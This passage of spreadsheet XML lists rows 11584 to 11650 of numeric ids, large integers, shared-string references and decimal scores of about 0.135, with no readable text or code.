        <v>0.1365348399246704</v>
      </c>
    </row>
    <row r="11584" ht="15.75" customHeight="1">
      <c r="A11584" s="1">
        <v>16084.0</v>
      </c>
      <c r="B11584" s="2">
        <v>4.5375909E7</v>
      </c>
      <c r="C11584" s="2" t="s">
        <v>11115</v>
      </c>
      <c r="D11584" s="2">
        <v>1.0</v>
      </c>
      <c r="E11584" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11584" s="2">
        <v>0.1365348399246704</v>
      </c>
    </row>
    <row r="11585" ht="15.75" customHeight="1">
      <c r="A11585" s="1">
        <v>19793.0</v>
      </c>
      <c r="B11585" s="2">
        <v>5.6839518E7</v>
      </c>
      <c r="C11585" s="2" t="s">
        <v>11116</v>
      </c>
      <c r="D11585" s="2">
        <v>1.0</v>
      </c>
      <c r="E11585" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11585" s="2">
        <v>0.1365348399246704</v>
      </c>
    </row>
    <row r="11586" ht="15.75" customHeight="1">
      <c r="A11586" s="1">
        <v>30408.0</v>
      </c>
      <c r="B11586" s="2">
        <v>3.8764735E7</v>
      </c>
      <c r="C11586" s="2" t="s">
        <v>11117</v>
      </c>
      <c r="D11586" s="2">
        <v>1.0</v>
      </c>
      <c r="E11586" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11586" s="2">
        <v>0.1365348399246704</v>
      </c>
    </row>
    <row r="11587" ht="15.75" customHeight="1">
      <c r="A11587" s="1">
        <v>29262.0</v>
      </c>
      <c r="B11587" s="2">
        <v>3.0979446E7</v>
      </c>
      <c r="C11587" s="2" t="s">
        <v>11118</v>
      </c>
      <c r="D11587" s="2">
        <v>1.0</v>
      </c>
      <c r="E11587" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11587" s="2">
        <v>0.1364379084967321</v>
      </c>
    </row>
    <row r="11588" ht="15.75" customHeight="1">
      <c r="A11588" s="1">
        <v>14194.0</v>
      </c>
      <c r="B11588" s="2">
        <v>3.8185988E7</v>
      </c>
      <c r="C11588" s="2" t="s">
        <v>11119</v>
      </c>
      <c r="D11588" s="2">
        <v>1.0</v>
      </c>
      <c r="E11588" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11588" s="2">
        <v>0.1363636363636364</v>
      </c>
    </row>
    <row r="11589" ht="15.75" customHeight="1">
      <c r="A11589" s="1">
        <v>10165.0</v>
      </c>
      <c r="B11589" s="2">
        <v>5.7353222E7</v>
      </c>
      <c r="C11589" s="2" t="s">
        <v>11120</v>
      </c>
      <c r="D11589" s="2">
        <v>1.0</v>
      </c>
      <c r="E11589" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11589" s="2">
        <v>0.1363636363636363</v>
      </c>
    </row>
    <row r="11590" ht="15.75" customHeight="1">
      <c r="A11590" s="1">
        <v>19570.0</v>
      </c>
      <c r="B11590" s="2">
        <v>5.6136064E7</v>
      </c>
      <c r="C11590" s="2" t="s">
        <v>11121</v>
      </c>
      <c r="D11590" s="2">
        <v>1.0</v>
      </c>
      <c r="E11590" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11590" s="2">
        <v>0.1363636363636363</v>
      </c>
    </row>
    <row r="11591" ht="15.75" customHeight="1">
      <c r="A11591" s="1">
        <v>25569.0</v>
      </c>
      <c r="B11591" s="2">
        <v>1.4329733E7</v>
      </c>
      <c r="C11591" s="2" t="s">
        <v>11122</v>
      </c>
      <c r="D11591" s="2">
        <v>1.0</v>
      </c>
      <c r="E11591" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11591" s="2">
        <v>0.1362847222222222</v>
      </c>
    </row>
    <row r="11592" ht="15.75" customHeight="1">
      <c r="A11592" s="1">
        <v>4088.0</v>
      </c>
      <c r="B11592" s="2">
        <v>4.1221383E7</v>
      </c>
      <c r="C11592" s="2" t="s">
        <v>11123</v>
      </c>
      <c r="D11592" s="2">
        <v>1.0</v>
      </c>
      <c r="E11592" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11592" s="2">
        <v>0.1361111111111112</v>
      </c>
    </row>
    <row r="11593" ht="15.75" customHeight="1">
      <c r="A11593" s="1">
        <v>5132.0</v>
      </c>
      <c r="B11593" s="2">
        <v>4.4623925E7</v>
      </c>
      <c r="C11593" s="2" t="s">
        <v>11124</v>
      </c>
      <c r="D11593" s="2">
        <v>1.0</v>
      </c>
      <c r="E11593" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11593" s="2">
        <v>0.1361111111111112</v>
      </c>
    </row>
    <row r="11594" ht="15.75" customHeight="1">
      <c r="A11594" s="1">
        <v>9180.0</v>
      </c>
      <c r="B11594" s="2">
        <v>5.5373391E7</v>
      </c>
      <c r="C11594" s="2" t="s">
        <v>11125</v>
      </c>
      <c r="D11594" s="2">
        <v>1.0</v>
      </c>
      <c r="E11594" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11594" s="2">
        <v>0.1361111111111112</v>
      </c>
    </row>
    <row r="11595" ht="15.75" customHeight="1">
      <c r="A11595" s="1">
        <v>14505.0</v>
      </c>
      <c r="B11595" s="2">
        <v>3.9695399E7</v>
      </c>
      <c r="C11595" s="2" t="s">
        <v>11126</v>
      </c>
      <c r="D11595" s="2">
        <v>1.0</v>
      </c>
      <c r="E11595" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11595" s="2">
        <v>0.1361111111111112</v>
      </c>
    </row>
    <row r="11596" ht="15.75" customHeight="1">
      <c r="A11596" s="1">
        <v>24204.0</v>
      </c>
      <c r="B11596" s="2">
        <v>1.0369639E7</v>
      </c>
      <c r="C11596" s="2" t="s">
        <v>11127</v>
      </c>
      <c r="D11596" s="2">
        <v>1.0</v>
      </c>
      <c r="E11596" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11596" s="2">
        <v>0.1361111111111112</v>
      </c>
    </row>
    <row r="11597" ht="15.75" customHeight="1">
      <c r="A11597" s="1">
        <v>3212.0</v>
      </c>
      <c r="B11597" s="2">
        <v>3.7284101E7</v>
      </c>
      <c r="C11597" s="2" t="s">
        <v>11128</v>
      </c>
      <c r="D11597" s="2">
        <v>1.0</v>
      </c>
      <c r="E11597" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11597" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="11598" ht="15.75" customHeight="1">
      <c r="A11598" s="1">
        <v>4409.0</v>
      </c>
      <c r="B11598" s="2">
        <v>4.2281907E7</v>
      </c>
      <c r="C11598" s="2" t="s">
        <v>11129</v>
      </c>
      <c r="D11598" s="2">
        <v>1.0</v>
      </c>
      <c r="E11598" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11598" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="11599" ht="15.75" customHeight="1">
      <c r="A11599" s="1">
        <v>5547.0</v>
      </c>
      <c r="B11599" s="2">
        <v>4.5925699E7</v>
      </c>
      <c r="C11599" s="2" t="s">
        <v>11130</v>
      </c>
      <c r="D11599" s="2">
        <v>1.0</v>
      </c>
      <c r="E11599" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11599" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="11600" ht="15.75" customHeight="1">
      <c r="A11600" s="1">
        <v>7484.0</v>
      </c>
      <c r="B11600" s="2">
        <v>5.1357327E7</v>
      </c>
      <c r="C11600" s="2" t="s">
        <v>11131</v>
      </c>
      <c r="D11600" s="2">
        <v>1.0</v>
      </c>
      <c r="E11600" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11600" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="11601" ht="15.75" customHeight="1">
      <c r="A11601" s="1">
        <v>11018.0</v>
      </c>
      <c r="B11601" s="2">
        <v>1.7810564E7</v>
      </c>
      <c r="C11601" s="2" t="s">
        <v>11132</v>
      </c>
      <c r="D11601" s="2">
        <v>1.0</v>
      </c>
      <c r="E11601" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11601" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="11602" ht="15.75" customHeight="1">
      <c r="A11602" s="1">
        <v>12226.0</v>
      </c>
      <c r="B11602" s="2">
        <v>2.7775959E7</v>
      </c>
      <c r="C11602" s="5" t="s">
        <v>11133</v>
      </c>
      <c r="D11602" s="2">
        <v>1.0</v>
      </c>
      <c r="E11602" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11602" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="11603" ht="15.75" customHeight="1">
      <c r="A11603" s="1">
        <v>20968.0</v>
      </c>
      <c r="B11603" s="2">
        <v>1.6776661E7</v>
      </c>
      <c r="C11603" s="2" t="s">
        <v>11134</v>
      </c>
      <c r="D11603" s="2">
        <v>1.0</v>
      </c>
      <c r="E11603" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11603" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="11604" ht="15.75" customHeight="1">
      <c r="A11604" s="1">
        <v>25051.0</v>
      </c>
      <c r="B11604" s="2">
        <v>1.2866302E7</v>
      </c>
      <c r="C11604" s="2" t="s">
        <v>11135</v>
      </c>
      <c r="D11604" s="2">
        <v>1.0</v>
      </c>
      <c r="E11604" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11604" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="11605" ht="15.75" customHeight="1">
      <c r="A11605" s="1">
        <v>18005.0</v>
      </c>
      <c r="B11605" s="2">
        <v>5.1427273E7</v>
      </c>
      <c r="C11605" s="2" t="s">
        <v>11136</v>
      </c>
      <c r="D11605" s="2">
        <v>1.0</v>
      </c>
      <c r="E11605" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11605" s="2">
        <v>0.1359126984126985</v>
      </c>
    </row>
    <row r="11606" ht="15.75" customHeight="1">
      <c r="A11606" s="1">
        <v>19795.0</v>
      </c>
      <c r="B11606" s="2">
        <v>5.6839518E7</v>
      </c>
      <c r="C11606" s="2" t="s">
        <v>11137</v>
      </c>
      <c r="D11606" s="2">
        <v>1.0</v>
      </c>
      <c r="E11606" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11606" s="2">
        <v>0.1359126984126985</v>
      </c>
    </row>
    <row r="11607" ht="15.75" customHeight="1">
      <c r="A11607" s="1">
        <v>1344.0</v>
      </c>
      <c r="B11607" s="2">
        <v>2.589366E7</v>
      </c>
      <c r="C11607" s="2" t="s">
        <v>11138</v>
      </c>
      <c r="D11607" s="2">
        <v>1.0</v>
      </c>
      <c r="E11607" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11607" s="2">
        <v>0.1358974358974359</v>
      </c>
    </row>
    <row r="11608" ht="15.75" customHeight="1">
      <c r="A11608" s="1">
        <v>12487.0</v>
      </c>
      <c r="B11608" s="2">
        <v>2.9515152E7</v>
      </c>
      <c r="C11608" s="2" t="s">
        <v>11139</v>
      </c>
      <c r="D11608" s="2">
        <v>1.0</v>
      </c>
      <c r="E11608" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11608" s="2">
        <v>0.1358974358974359</v>
      </c>
    </row>
    <row r="11609" ht="15.75" customHeight="1">
      <c r="A11609" s="1">
        <v>6945.0</v>
      </c>
      <c r="B11609" s="2">
        <v>4.9932056E7</v>
      </c>
      <c r="C11609" s="2" t="s">
        <v>11140</v>
      </c>
      <c r="D11609" s="2">
        <v>1.0</v>
      </c>
      <c r="E11609" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11609" s="2">
        <v>0.135885885885886</v>
      </c>
    </row>
    <row r="11610" ht="15.75" customHeight="1">
      <c r="A11610" s="1">
        <v>18218.0</v>
      </c>
      <c r="B11610" s="2">
        <v>5.2091123E7</v>
      </c>
      <c r="C11610" s="2" t="s">
        <v>11141</v>
      </c>
      <c r="D11610" s="2">
        <v>1.0</v>
      </c>
      <c r="E11610" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11610" s="2">
        <v>0.1357012750455374</v>
      </c>
    </row>
    <row r="11611" ht="15.75" customHeight="1">
      <c r="A11611" s="1">
        <v>18466.0</v>
      </c>
      <c r="B11611" s="2">
        <v>5.2845714E7</v>
      </c>
      <c r="C11611" s="2" t="s">
        <v>11142</v>
      </c>
      <c r="D11611" s="2">
        <v>1.0</v>
      </c>
      <c r="E11611" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11611" s="2">
        <v>0.1357012750455374</v>
      </c>
    </row>
    <row r="11612" ht="15.75" customHeight="1">
      <c r="A11612" s="1">
        <v>29204.0</v>
      </c>
      <c r="B11612" s="2">
        <v>3.0766178E7</v>
      </c>
      <c r="C11612" s="2" t="s">
        <v>11143</v>
      </c>
      <c r="D11612" s="2">
        <v>1.0</v>
      </c>
      <c r="E11612" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11612" s="2">
        <v>0.1357012750455374</v>
      </c>
    </row>
    <row r="11613" ht="15.75" customHeight="1">
      <c r="A11613" s="1">
        <v>8155.0</v>
      </c>
      <c r="B11613" s="2">
        <v>5.3187454E7</v>
      </c>
      <c r="C11613" s="2" t="s">
        <v>11144</v>
      </c>
      <c r="D11613" s="2">
        <v>1.0</v>
      </c>
      <c r="E11613" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11613" s="2">
        <v>0.1355218855218856</v>
      </c>
    </row>
    <row r="11614" ht="15.75" customHeight="1">
      <c r="A11614" s="1">
        <v>4504.0</v>
      </c>
      <c r="B11614" s="2">
        <v>4.2579141E7</v>
      </c>
      <c r="C11614" s="2" t="s">
        <v>11145</v>
      </c>
      <c r="D11614" s="2">
        <v>1.0</v>
      </c>
      <c r="E11614" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11614" s="2">
        <v>0.1354775828460039</v>
      </c>
    </row>
    <row r="11615" ht="15.75" customHeight="1">
      <c r="A11615" s="1">
        <v>24571.0</v>
      </c>
      <c r="B11615" s="2">
        <v>1.1317908E7</v>
      </c>
      <c r="C11615" s="2" t="s">
        <v>11146</v>
      </c>
      <c r="D11615" s="2">
        <v>1.0</v>
      </c>
      <c r="E11615" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11615" s="2">
        <v>0.1354775828460039</v>
      </c>
    </row>
    <row r="11616" ht="15.75" customHeight="1">
      <c r="A11616" s="1">
        <v>3064.0</v>
      </c>
      <c r="B11616" s="2">
        <v>3.6510877E7</v>
      </c>
      <c r="C11616" s="2" t="s">
        <v>11147</v>
      </c>
      <c r="D11616" s="2">
        <v>1.0</v>
      </c>
      <c r="E11616" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11616" s="2">
        <v>0.1353677621283255</v>
      </c>
    </row>
    <row r="11617" ht="15.75" customHeight="1">
      <c r="A11617" s="1">
        <v>24361.0</v>
      </c>
      <c r="B11617" s="2">
        <v>1.0739806E7</v>
      </c>
      <c r="C11617" s="2" t="s">
        <v>11148</v>
      </c>
      <c r="D11617" s="2">
        <v>1.0</v>
      </c>
      <c r="E11617" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11617" s="2">
        <v>0.135233918128655</v>
      </c>
    </row>
    <row r="11618" ht="15.75" customHeight="1">
      <c r="A11618" s="1">
        <v>1427.0</v>
      </c>
      <c r="B11618" s="2">
        <v>2.6592092E7</v>
      </c>
      <c r="C11618" s="2" t="s">
        <v>11149</v>
      </c>
      <c r="D11618" s="2">
        <v>1.0</v>
      </c>
      <c r="E11618" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11618" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="11619" ht="15.75" customHeight="1">
      <c r="A11619" s="1">
        <v>6006.0</v>
      </c>
      <c r="B11619" s="2">
        <v>4.7469722E7</v>
      </c>
      <c r="C11619" s="2" t="s">
        <v>11150</v>
      </c>
      <c r="D11619" s="2">
        <v>1.0</v>
      </c>
      <c r="E11619" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11619" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="11620" ht="15.75" customHeight="1">
      <c r="A11620" s="1">
        <v>6277.0</v>
      </c>
      <c r="B11620" s="2">
        <v>4.8144472E7</v>
      </c>
      <c r="C11620" s="2" t="s">
        <v>11151</v>
      </c>
      <c r="D11620" s="2">
        <v>1.0</v>
      </c>
      <c r="E11620" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11620" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="11621" ht="15.75" customHeight="1">
      <c r="A11621" s="1">
        <v>8394.0</v>
      </c>
      <c r="B11621" s="2">
        <v>5.3856019E7</v>
      </c>
      <c r="C11621" s="2" t="s">
        <v>11152</v>
      </c>
      <c r="D11621" s="2">
        <v>1.0</v>
      </c>
      <c r="E11621" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11621" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="11622" ht="15.75" customHeight="1">
      <c r="A11622" s="1">
        <v>8397.0</v>
      </c>
      <c r="B11622" s="2">
        <v>5.3856019E7</v>
      </c>
      <c r="C11622" s="2" t="s">
        <v>11153</v>
      </c>
      <c r="D11622" s="2">
        <v>1.0</v>
      </c>
      <c r="E11622" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11622" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="11623" ht="15.75" customHeight="1">
      <c r="A11623" s="1">
        <v>9266.0</v>
      </c>
      <c r="B11623" s="2">
        <v>5.5491338E7</v>
      </c>
      <c r="C11623" s="2" t="s">
        <v>11154</v>
      </c>
      <c r="D11623" s="2">
        <v>1.0</v>
      </c>
      <c r="E11623" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11623" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="11624" ht="15.75" customHeight="1">
      <c r="A11624" s="1">
        <v>10120.0</v>
      </c>
      <c r="B11624" s="2">
        <v>5.7253853E7</v>
      </c>
      <c r="C11624" s="2" t="s">
        <v>11155</v>
      </c>
      <c r="D11624" s="2">
        <v>1.0</v>
      </c>
      <c r="E11624" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11624" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="11625" ht="15.75" customHeight="1">
      <c r="A11625" s="1">
        <v>14872.0</v>
      </c>
      <c r="B11625" s="2">
        <v>4.1076296E7</v>
      </c>
      <c r="C11625" s="2" t="s">
        <v>11156</v>
      </c>
      <c r="D11625" s="2">
        <v>1.0</v>
      </c>
      <c r="E11625" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11625" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="11626" ht="15.75" customHeight="1">
      <c r="A11626" s="1">
        <v>14873.0</v>
      </c>
      <c r="B11626" s="2">
        <v>4.1076296E7</v>
      </c>
      <c r="C11626" s="2" t="s">
        <v>11157</v>
      </c>
      <c r="D11626" s="2">
        <v>1.0</v>
      </c>
      <c r="E11626" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11626" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="11627" ht="15.75" customHeight="1">
      <c r="A11627" s="1">
        <v>18508.0</v>
      </c>
      <c r="B11627" s="2">
        <v>5.2988947E7</v>
      </c>
      <c r="C11627" s="2" t="s">
        <v>11158</v>
      </c>
      <c r="D11627" s="2">
        <v>1.0</v>
      </c>
      <c r="E11627" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11627" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="11628" ht="15.75" customHeight="1">
      <c r="A11628" s="1">
        <v>19260.0</v>
      </c>
      <c r="B11628" s="2">
        <v>5.5128777E7</v>
      </c>
      <c r="C11628" s="2" t="s">
        <v>11159</v>
      </c>
      <c r="D11628" s="2">
        <v>1.0</v>
      </c>
      <c r="E11628" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11628" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="11629" ht="15.75" customHeight="1">
      <c r="A11629" s="1">
        <v>27432.0</v>
      </c>
      <c r="B11629" s="2">
        <v>2.1920157E7</v>
      </c>
      <c r="C11629" s="2" t="s">
        <v>11160</v>
      </c>
      <c r="D11629" s="2">
        <v>1.0</v>
      </c>
      <c r="E11629" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11629" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="11630" ht="15.75" customHeight="1">
      <c r="A11630" s="1">
        <v>4479.0</v>
      </c>
      <c r="B11630" s="2">
        <v>4.2502922E7</v>
      </c>
      <c r="C11630" s="2" t="s">
        <v>11161</v>
      </c>
      <c r="D11630" s="2">
        <v>1.0</v>
      </c>
      <c r="E11630" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11630" s="2">
        <v>0.1350574712643678</v>
      </c>
    </row>
    <row r="11631" ht="15.75" customHeight="1">
      <c r="A11631" s="1">
        <v>25462.0</v>
      </c>
      <c r="B11631" s="2">
        <v>1.3975281E7</v>
      </c>
      <c r="C11631" s="2" t="s">
        <v>11162</v>
      </c>
      <c r="D11631" s="2">
        <v>1.0</v>
      </c>
      <c r="E11631" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11631" s="2">
        <v>0.1350574712643678</v>
      </c>
    </row>
    <row r="11632" ht="15.75" customHeight="1">
      <c r="A11632" s="1">
        <v>6402.0</v>
      </c>
      <c r="B11632" s="2">
        <v>4.8485112E7</v>
      </c>
      <c r="C11632" s="2" t="s">
        <v>11163</v>
      </c>
      <c r="D11632" s="2">
        <v>1.0</v>
      </c>
      <c r="E11632" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11632" s="2">
        <v>0.1348039215686275</v>
      </c>
    </row>
    <row r="11633" ht="15.75" customHeight="1">
      <c r="A11633" s="1">
        <v>18089.0</v>
      </c>
      <c r="B11633" s="2">
        <v>5.1679356E7</v>
      </c>
      <c r="C11633" s="2" t="s">
        <v>11164</v>
      </c>
      <c r="D11633" s="2">
        <v>1.0</v>
      </c>
      <c r="E11633" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11633" s="2">
        <v>0.1348039215686275</v>
      </c>
    </row>
    <row r="11634" ht="15.75" customHeight="1">
      <c r="A11634" s="1">
        <v>12700.0</v>
      </c>
      <c r="B11634" s="2">
        <v>3.0799558E7</v>
      </c>
      <c r="C11634" s="2" t="s">
        <v>11165</v>
      </c>
      <c r="D11634" s="2">
        <v>1.0</v>
      </c>
      <c r="E11634" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11634" s="2">
        <v>0.1346516007532957</v>
      </c>
    </row>
    <row r="11635" ht="15.75" customHeight="1">
      <c r="A11635" s="1">
        <v>18228.0</v>
      </c>
      <c r="B11635" s="2">
        <v>5.2108671E7</v>
      </c>
      <c r="C11635" s="2" t="s">
        <v>11166</v>
      </c>
      <c r="D11635" s="2">
        <v>1.0</v>
      </c>
      <c r="E11635" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11635" s="2">
        <v>0.1346516007532957</v>
      </c>
    </row>
    <row r="11636" ht="15.75" customHeight="1">
      <c r="A11636" s="1">
        <v>9375.0</v>
      </c>
      <c r="B11636" s="2">
        <v>5.5701918E7</v>
      </c>
      <c r="C11636" s="2" t="s">
        <v>11167</v>
      </c>
      <c r="D11636" s="2">
        <v>1.0</v>
      </c>
      <c r="E11636" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11636" s="2">
        <v>0.1343434343434343</v>
      </c>
    </row>
    <row r="11637" ht="15.75" customHeight="1">
      <c r="A11637" s="1">
        <v>4800.0</v>
      </c>
      <c r="B11637" s="2">
        <v>4.3512056E7</v>
      </c>
      <c r="C11637" s="2" t="s">
        <v>11168</v>
      </c>
      <c r="D11637" s="2">
        <v>1.0</v>
      </c>
      <c r="E11637" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11637" s="2">
        <v>0.1342592592592593</v>
      </c>
    </row>
    <row r="11638" ht="15.75" customHeight="1">
      <c r="A11638" s="1">
        <v>6518.0</v>
      </c>
      <c r="B11638" s="2">
        <v>4.8786111E7</v>
      </c>
      <c r="C11638" s="2" t="s">
        <v>11169</v>
      </c>
      <c r="D11638" s="2">
        <v>1.0</v>
      </c>
      <c r="E11638" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11638" s="2">
        <v>0.1342592592592593</v>
      </c>
    </row>
    <row r="11639" ht="15.75" customHeight="1">
      <c r="A11639" s="1">
        <v>18462.0</v>
      </c>
      <c r="B11639" s="2">
        <v>5.2830591E7</v>
      </c>
      <c r="C11639" s="2" t="s">
        <v>11170</v>
      </c>
      <c r="D11639" s="2">
        <v>1.0</v>
      </c>
      <c r="E11639" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11639" s="2">
        <v>0.1342592592592593</v>
      </c>
    </row>
    <row r="11640" ht="15.75" customHeight="1">
      <c r="A11640" s="1">
        <v>23657.0</v>
      </c>
      <c r="B11640" s="2">
        <v>6825213.0</v>
      </c>
      <c r="C11640" s="2" t="s">
        <v>11171</v>
      </c>
      <c r="D11640" s="2">
        <v>1.0</v>
      </c>
      <c r="E11640" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11640" s="2">
        <v>0.1342592592592593</v>
      </c>
    </row>
    <row r="11641" ht="15.75" customHeight="1">
      <c r="A11641" s="1">
        <v>27565.0</v>
      </c>
      <c r="B11641" s="2">
        <v>2.242347E7</v>
      </c>
      <c r="C11641" s="2" t="s">
        <v>11172</v>
      </c>
      <c r="D11641" s="2">
        <v>1.0</v>
      </c>
      <c r="E11641" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11641" s="2">
        <v>0.1341880341880342</v>
      </c>
    </row>
    <row r="11642" ht="15.75" customHeight="1">
      <c r="A11642" s="1">
        <v>3806.0</v>
      </c>
      <c r="B11642" s="2">
        <v>4.0040001E7</v>
      </c>
      <c r="C11642" s="2" t="s">
        <v>11173</v>
      </c>
      <c r="D11642" s="2">
        <v>1.0</v>
      </c>
      <c r="E11642" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11642" s="2">
        <v>0.1339285714285715</v>
      </c>
    </row>
    <row r="11643" ht="15.75" customHeight="1">
      <c r="A11643" s="1">
        <v>2370.0</v>
      </c>
      <c r="B11643" s="2">
        <v>3.3243756E7</v>
      </c>
      <c r="C11643" s="2" t="s">
        <v>11174</v>
      </c>
      <c r="D11643" s="2">
        <v>1.0</v>
      </c>
      <c r="E11643" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11643" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="11644" ht="15.75" customHeight="1">
      <c r="A11644" s="1">
        <v>3882.0</v>
      </c>
      <c r="B11644" s="2">
        <v>4.0360728E7</v>
      </c>
      <c r="C11644" s="2" t="s">
        <v>11175</v>
      </c>
      <c r="D11644" s="2">
        <v>1.0</v>
      </c>
      <c r="E11644" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11644" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="11645" ht="15.75" customHeight="1">
      <c r="A11645" s="1">
        <v>4112.0</v>
      </c>
      <c r="B11645" s="2">
        <v>4.1338516E7</v>
      </c>
      <c r="C11645" s="2" t="s">
        <v>11176</v>
      </c>
      <c r="D11645" s="2">
        <v>1.0</v>
      </c>
      <c r="E11645" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11645" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="11646" ht="15.75" customHeight="1">
      <c r="A11646" s="1">
        <v>4915.0</v>
      </c>
      <c r="B11646" s="2">
        <v>4.3938542E7</v>
      </c>
      <c r="C11646" s="2" t="s">
        <v>11177</v>
      </c>
      <c r="D11646" s="2">
        <v>1.0</v>
      </c>
      <c r="E11646" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11646" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="11647" ht="15.75" customHeight="1">
      <c r="A11647" s="1">
        <v>5532.0</v>
      </c>
      <c r="B11647" s="2">
        <v>4.5880281E7</v>
      </c>
      <c r="C11647" s="2" t="s">
        <v>11178</v>
      </c>
      <c r="D11647" s="2">
        <v>1.0</v>
      </c>
      <c r="E11647" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11647" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="11648" ht="15.75" customHeight="1">
      <c r="A11648" s="1">
        <v>6623.0</v>
      </c>
      <c r="B11648" s="2">
        <v>4.9056012E7</v>
      </c>
      <c r="C11648" s="2" t="s">
        <v>11179</v>
      </c>
      <c r="D11648" s="2">
        <v>1.0</v>
      </c>
      <c r="E11648" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11648" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="11649" ht="15.75" customHeight="1">
      <c r="A11649" s="1">
        <v>7469.0</v>
      </c>
      <c r="B11649" s="2">
        <v>5.1280541E7</v>
      </c>
      <c r="C11649" s="2" t="s">
        <v>11180</v>
      </c>
      <c r="D11649" s="2">
        <v>1.0</v>
      </c>
      <c r="E11649" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11649" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="11650" ht="15.75" customHeight="1">
      <c r="A11650" s="1">
        <v>8110.0</v>
      </c>
      <c r="B11650" s="2">
        <v>5.3073417E7</v>
      </c>
      <c r="C11650" s="2" t="s">
        <v>11181</v>
      </c>
      <c r="D11650" s="2">
        <v>1.0</v>
      </c>
      <c r="E11650" s="3" t="s">
        <v>10480</v>
      </c>
